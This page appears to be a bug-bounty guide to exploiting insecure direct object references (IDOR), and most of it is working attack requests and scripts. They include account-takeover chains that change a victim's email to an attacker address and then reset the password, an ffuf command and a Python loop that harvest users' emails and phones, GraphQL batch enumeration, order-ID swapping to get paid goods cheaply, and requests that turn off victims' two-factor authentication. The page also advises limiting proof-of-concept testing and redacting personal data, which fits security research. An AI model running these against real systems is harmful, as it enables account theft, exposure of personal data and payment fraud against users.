IDOR Exploitation¶
You found an IDOR. Now demonstrate impact.
Exploitation Patterns¶
1. Horizontal IDOR (Same Role, Different User)¶
Classic parameter swap:
# Your request
GET /api/users/123/profile
Authorization: Bearer your_token
# Attack
GET /api/users/124/profile # Victim's ID
Authorization: Bearer your_token
2. Vertical IDOR (Role Escalation)¶
Admin function access:
# Normal user accessing admin endpoint
POST /api/admin/users
Authorization: Bearer normal_user_token
{"action": "create", "role": "admin"}
Role assignment:
3. Account Takeover Chains¶
Email change → Password reset:
POST /api/users/VICTIM_ID/profile
Authorization: Bearer attacker_token
{"email": "attacker@evil.com"}
# Then trigger password reset
Direct password override:
POST /resetPassword HTTP/1.1
Cookie: UID2=VICTIM_ID
userName=victim@example.com&newPassword=pwned123
Data Exfiltration¶
Mass Enumeration¶
# ffuf for fast enumeration
ffuf -u "https://target.com/api/users/FUZZ/data" \
-w <(seq 1 100000) \
-H "Authorization: Bearer $TOKEN" \
-mc 200 -o results.json
File Download IDOR¶
ffuf -u "http://target.com/download.php?id=FUZZ" \
-H "Cookie: PHPSESSID=xxx" \
-w <(seq 0 6000) \
-fr 'File Not Found'
API Response Harvesting¶
import requests
token = "your_bearer_token"
headers = {"Authorization": f"Bearer {token}"}
for user_id in range(1, 10001):
r = requests.get(f"https://target.com/api/users/{user_id}", headers=headers)
if r.status_code == 200:
data = r.json()
print(f"{user_id}: {data.get('email')} - {data.get('phone')}")
GraphQL Exploitation¶
Single Query¶
Batch Enumeration¶
query {
u1: user(id: "1") { email phone }
u2: user(id: "2") { email phone }
u3: user(id: "3") { email phone }
# Continue for more...
}
Cookie-Based IDOR¶
If UID and session are independently validated, you may access victim data with your session.
Financial Manipulation¶
Order ID Swapping¶
# Create cheap order → $1.99
POST /api/orders
{"coins": 500, "price": 199}
→ order_id: "ORDER_CHEAP"
# Create expensive order → $9.99
POST /api/orders
{"coins": 1100, "price": 999}
→ order_id: "ORDER_EXPENSIVE"
# Pay for cheap, get expensive
POST /api/checkout
{"order_id": "ORDER_CHEAP"} # But modify to get expensive items
Transaction History Access¶
Multi-Step IDORs¶
Step 1: Read data
Step 2: Modify data
Step 3: Trigger action
Predictable Token/QR Code IDOR¶
Wristband QR enumeration:
def to_hex(s):
return ''.join(f"{ord(c):02x}" for c in s)
for band_id in ["C-285-100", "T-544-492"]:
hex_id = to_hex(band_id)
r = requests.get(f"https://target.com/api?id={hex_id}")
if "media" in r.text:
print(band_id, r.json())
Write Operations¶
Modify Other Users' Data¶
PUT /api/users/VICTIM_ID/settings
Authorization: Bearer attacker_token
{
"notifications": false,
"email": "attacker@evil.com",
"two_factor": false
}
Delete Other Users' Resources¶
Create Resources for Other Users¶
POST /api/users/VICTIM_ID/posts
Authorization: Bearer attacker_token
{
"content": "Posted by attacker via IDOR"
}
Demonstrating Impact¶
PoC Best Practices¶
- Don't mass-exploit — Show 2-3 examples max
- Redact PII — Blur/mask sensitive data in screenshots
- Document the flow — Step-by-step reproduction
- Calculate scale — "Affects all X users in database"
Impact Statements¶
| Action | Impact Statement |
|---|---|
| Read PII | "Attacker can access personal data of all users" |
| Modify data | "Attacker can tamper with any user's settings/data" |
| ATO via email change | "Attacker can take over any account" |
| Financial | "Attacker can view/modify payment information" |
| Delete | "Attacker can delete any user's resources" |
Exploitation Checklist¶
- Confirm IDOR works with two accounts
- Test Read/Create/Update/Delete operations
- Enumerate scale (how many records affected?)
- Check for sensitive data exposure
- Try ATO chains (email change → password reset)
- Document with screenshots
- Estimate total impact
Hit validation? Check Bypasses.
Ready to maximize impact? Move to Escalation.